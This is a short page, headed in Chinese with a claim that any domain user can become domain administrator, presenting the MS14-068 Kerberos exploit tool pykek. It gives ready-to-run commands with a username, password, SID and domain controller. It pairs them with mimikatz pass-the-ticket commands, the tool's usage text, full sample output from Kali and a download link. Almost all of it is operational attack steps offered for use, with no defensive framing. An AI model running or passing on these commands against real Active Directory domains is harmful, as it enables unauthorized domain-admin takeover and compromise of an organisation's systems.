可以让任何域内用户提升为域管理员

 

 

c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.local
mimikatz.exe "kerberos::ptc TGT_k8test3@k8.local.ccache" exit

 

 
 

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)

Domain Admins (512)

Schema Admins (518)

Enterprise Admins (519)

Group Policy Creator Owners (520)

USAGE:

ms14-068.py
-u <userName>@<domainName>
-s <userSid>
-d <domainControlerAddr>

 

OPTIONS:

-p <clearPassword>

--rc4 <ntlmHash>

Example usage :

 

Linux
(tested with samba and MIT Kerberos)

 

root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

Password:

[+]
Building AS-REQ for dc-a-2003.dom-a.loc...
Done!

[+]
Sending AS-REQ to dc-a-2003.dom-a.loc...
Done!

[+]
Receiving AS-REP from dc-a-2003.dom-a.loc...
Done!

[+]
Parsing AS-REP from dc-a-2003.dom-a.loc...
Done!

[+]
Building TGS-REQ for dc-a-2003.dom-a.loc...
Done!

[+]
Sending TGS-REQ to dc-a-2003.dom-a.loc...
Done!

[+]
Receiving TGS-REP from dc-a-2003.dom-a.loc...
Done!

[+]
Parsing TGS-REP from dc-a-2003.dom-a.loc...
Done!

[+]
Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'...
Done!

root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0

On Windows

python.exe ms14-068.py
-u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103
-d dc-a-2003.dom-a.loc

mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache"
exit`

下载地址

https://github.com/bidord/pykek